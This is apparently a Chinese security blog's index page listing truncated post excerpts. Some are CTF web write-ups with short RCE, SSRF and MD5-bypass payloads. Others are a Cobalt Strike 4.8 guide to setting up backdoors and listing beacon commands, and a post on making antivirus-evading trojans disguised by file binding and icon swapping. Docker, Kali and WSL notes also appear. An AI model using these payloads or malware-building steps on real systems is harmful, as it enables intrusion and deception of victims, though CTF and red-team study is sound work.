梦~醒🥝
hubu新星杯实践能力赛模拟赛web-wp
ez_eval 123456789 <?phphighlight_file(__FILE__);error_reporting(0);$hubu = $_GET['hubu'];eval($hubu);?> 先进行代码审计,GET传参hubu,并执行命令,没有任何绕过,放开手脚去做 payload: 1?hubu=system('cat /f*'); #直接rce rce_level1 12345678910 <?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} 代码审计,发现过滤了关键字flag,sys ...
华科第一届网络安全挑战赛wp
[TOC] web secure_shell 考点:exec()无回显 对于这类题有个很简单的方法,直接将flag写进文件,然后路径读取就行 先测试一下能不能执行 cmd=1;sleep 4 发现反应了4秒,能执行 然后直接 cat /f* > 1.txt 最后访问/1.txt路径就行 pyssrf 考点:ssrf漏洞 打开有个提示 /get?site= 直接file读取flag /get?site=file:///flag 碎碎念:以为很难。。。试了半天。。。。 misc 一闪一闪亮晶晶 考点:凯撒与base64结合,starry语言 根据提示,“凯撒大帝想学习一下Starry语言,你能帮帮他么吗”,一定跟凯撒密码和starry语言有关。 下载文件,是一串重复度非常高的字符串 1JDBhJDBsJDBhJDBsJDBhJDBhJDBsJDBrJDBhJDBhLzphJDBhJDBhJDthJDphJDBhJDtrJDBhJDBhJDBsJDBrJDBhJDBhJDtrJDBhJDBhJDBsJDBrJDBhJDBhLxprJDBhJDBhJDBsJD ...
Restorator常见使用方法
Restorator常见使用方法有哪些? 案例一:解决WinRAR弹出广告 1、导出rc文件 WinRAR安装完成后,用Restorator 2018打开安装目录WinRAR.exe。点开“打开”对话框后,通过WinRAR的安装路径,找到这个exe程序,然后点击“打开”。 Restorator 2018界面主要分为左右两个区,左边是资源树,我们点击“字符串”左边的加号,在展开的项目中,右键点击“中文”,然后选择“导出”→“导出为.rc”,保存到桌面: 2、打开rc文件 上一步会导出一个.rc后缀的文件到指定位置。这一步我们去找到这个文件。如下图所示,我将导出的文件命名为“WinRAR导出分析-中文(简体,中-国).rc”,找到它,右键点开菜单后选择“打开方式”,然后用记事本的方式打开它也可以用文本编辑工具(notepad++)修改: 注意选择用记事本打开这个.rc文件时,不要勾选“始终用此应用打开.rc文件”。 3、定位弹广代码 这一步很关键。下图就是用记事本打开.rc文件的样子,可以看到每一行都有个序数,后面引号里是一个可执行操作的名字。我们需要找到有关弹窗广告的代码,并用合 ...
CobaltStrike4.8汉化版带插件使用方法
使用大致流程 创建团队服务器->客户端连接服务器->创建监听器->生成后门对应监听器->靶机运行后门成功上线->后渗透(提权,内网漫游,域渗透等) 一、安装 把全部文件下上传到外网VPS上,并给足权限 服务端运行起来 本地电脑使用客户端连接即可 主要输入HOST、Port、password即可 二、上线 1、设置监听器 2、生成木马后门 运行即可上线CS 3、指令大全 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889browserpivot 注入受害者浏览器进程sleep 3 全部命令3秒执行bypassuac 绕过UACcancel 取消正在进行的下载cd 切换目录checkin 强制让被控端回连一次clear 清除beacon内部的任务队 ...
免杀木马+文件捆绑+权限伪装
免杀木马+文件捆绑+权限伪装 文章前言 通过学习使用Cobalt Strike来制作木马,使用摧日对其进行免杀覆盖,使用GoFilebinder对其进行免杀捆绑,最后利用Restorator对其进行图标修改。 环境和软件准备 \1. 一台windows系统的电脑作为攻击机 2.一台靶机 3.Cobalt Strike 4.摧日 5.GoFilebinder 6.Restorator 工具介绍 摧日:一款红队专用免杀木马生成器,基于shellcode生成绕过所有杀软的木马主要支持C语言的shellcode和纯十六进制的shellcode GoFileBinder:golang免杀捆绑器 Restorator:一款修改exe执行程序图标的小工具 正文开始 选用cs中的c格式shellcode,用cs生成一个c语言的相关东西,同时勾选上x64 完成以上步骤后,接下来便开始对其进行免杀操作,用到的工具摧日对其进行免杀处理 使用前请先获取相关工具,并确保已经安装工具所需要的的go环境,至于go环境安装请各位自行查阅本文不在做出相关介绍,安装完毕后进行下一步操作。复制上一步 ...
docker删除镜像和容器
[TOC] 优雅删除镜像(推荐做法) 1、查看Docker要删除的镜像,如目标版本为stable-perl的Nginx,镜像ID(IMAGE ID)为 df1998569adb。 1docker images 2、使用命令“docker rmi 镜像ID”删除Nginx(stable-perl)的镜像,只取“IMAGE ID”的前3个字符即可。 1docker rmi df1 报错内容如下,意思是镜像(df1)存在使用中的容器(f66),不能强制删除镜像。官方的意思是要先停止容器运行,再进行镜像的删除操作吗? 1Error response from daemon: conflict: unable to delete df1998569adb (cannot be forced) - image is being used by running container f6678f2821c7 3、查看Docker运行中的容器,如容器 nginx:stable-perl ,容器ID为 f66。 1docker ps 4、先停止nginx:stable-perl容器(f66)运行,再去删除 ...
MD5绕过
记录网站:【CTF_Web:php弱类型绕过与md5碰撞 - CSDN App】http://t.csdnimg.cn/A58wf MD5函数漏洞 $str1 = $_GET[‘str1’]; $str2 = $_GET[‘str2’]; if (md5($str1) == md5($str2)){ die(‘OK’); } php弱类型比较产生的漏洞 想要满足这个判断只需要构造出MD5值为0e开头的字符串,这样的话弱类型比较会认为是科学技术法,0的多少次方都是0,因此可以绕过MD5 编码后0e开头的字符串: QNKCDZO(0e830400451993494058024219903391) aabg7XSs(0e087386482136013740957780965295) aaabEgHn(0e418636035810609803317995275027) 240610708 s878926199a s155964671a s214587387a 还有MD5和双MD5以后的值都是0e开头的 CbDLytmyGm2xQyaLNhWn 770hQgrBOjrcqftrlaZk 7r4l ...
Docker run 运行镜像
docker run :创建一个新的容器并运行一个命令 123456789101112131415161718192021222324252627282930313233343536373839语法docker run [OPTIONS] IMAGE [COMMAND] [ARG...]OPTIONS说明:-a stdin: 指定标准输入输出内容类型,可选 STDIN/STDOUT/STDERR 三项;-d: 后台运行容器,并返回容器ID;-i: 以交互模式运行容器,通常与 -t 同时使用;-P: 随机端口映射,容器内部端口随机映射到主机的端口-p: 指定端口映射,格式为:主机(宿主)端口:容器端口-t: 为容器重新分配一个伪输入终端,通常与 -i 同时使用;--name="nginx-lb": 为容器指定一个名称;--dns 8.8.8.8: 指定容器使用的DNS服务器,默认和宿主一致;--dns-search example.com: 指定容器DNS搜索域名,默认和宿主一致;-h "mars": 指定容器的hostname;-e userna ...
kali换源
一.更换源 1. 进入Kali Linux系统并打开命令行窗口,输入“ sudo -i ”回车输入密码以获取系统最高权限。 1sudo su #获取系统最高权限命令 输入vim /etc/apt/sources.list编辑软件源配置文件。 1vim /etc/apt/sources.list #使用vim访问源 将官方源如下加入“ # ”注释掉。 12345#官方源deb http://http.kali.org/kali kali-rolling main non-free contribdeb-src http://http.kali.org/kali kali-rolling main non-free contrib 加入以下任意一种国内源即可。 123456789101112131415161718#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu. ...
Windows 子系统 WSL使用系统代理
[TOC] 以Ubuntu + Clash为例 由Jeza Chen 发表于 June 3, 2020 最近使用WSL发现无法访问github相关的网站,基本都是Connection Refused,即便Windows系统使用了Clash也不能访问,按照网上一些教程,需要在WSL上进行一些配置才能用到系统的代理。 下面的操作基于WSL下的Ubuntu 20.04 LTS,主机代理软件为Clash。 在Clash软件找到HTTP代理端口(即软件里面的Port),如下图的7890。 在c盘的用户文件中创建.wslconfig文件,复制以下代码 123456 [experimental] autoMemoryReclaim=gradualnetworkingMode=mirrored dnsTunneling=true firewall=true autoProxy=true 在WSL的终端上输入 1vim ~/.bashrc 1234,在末行写入export http_proxy=127.0.0.1:7890export https_proxy=127.0 ...
ctfshow单身杯2024wp
[TOC] web 签到·好玩的PHP 考点:序列化反序列化 123456789101112131415161718192021222324252627282930<?php error_reporting(0); highlight_file(__FILE__); class ctfshow { private $d = ''; private $s = ''; private $b = ''; private $ctf = ''; public function __destruct() { $this->d = (string)$this->d; $this->s = (string)$this->s; $this->b = (string)$this->b; if (($this-> ...
ctfshow西瓜杯wp
[TOC] web CodeInject 考点:命令执行 12345678<?php#Author: h1xaerror_reporting(0);show_source(__FILE__);eval("var_dump((Object)$_POST[1]);"); 直接构造联合执行。 payload: 11=1);system('ls /'); # 11=1);system('cat /000f1ag.txt'); # ctfshow{729e8c3e-142b-447a-8186-86cdac43b7a1} tpdoor 考点:thinkphp漏洞 打开网址发现,就一句话,什么都没有 先下载源码 1234567891011121314151617181920212223242526272829<?phpnamespace app\controller;use app\BaseController;use think\facade\Db;class Index extends BaseCon ...
avatar
🐟认真摸鱼中
梦~醒🥝
往前走,别回头🍭🍭🍭
前往小窝
公告栏
--- 主域名 ---
blog.m3x1.cn | blog.m3x1.fun
--- 备用域名 ---
备用1
cloudflare.m3x1.cn
--- 网站安卓APP ---
🍧点此下载(暂无)🍧

空降评论复制本文地址
随便逛逛昼夜切换阅读模式关于博客美化设置切换全屏打印页面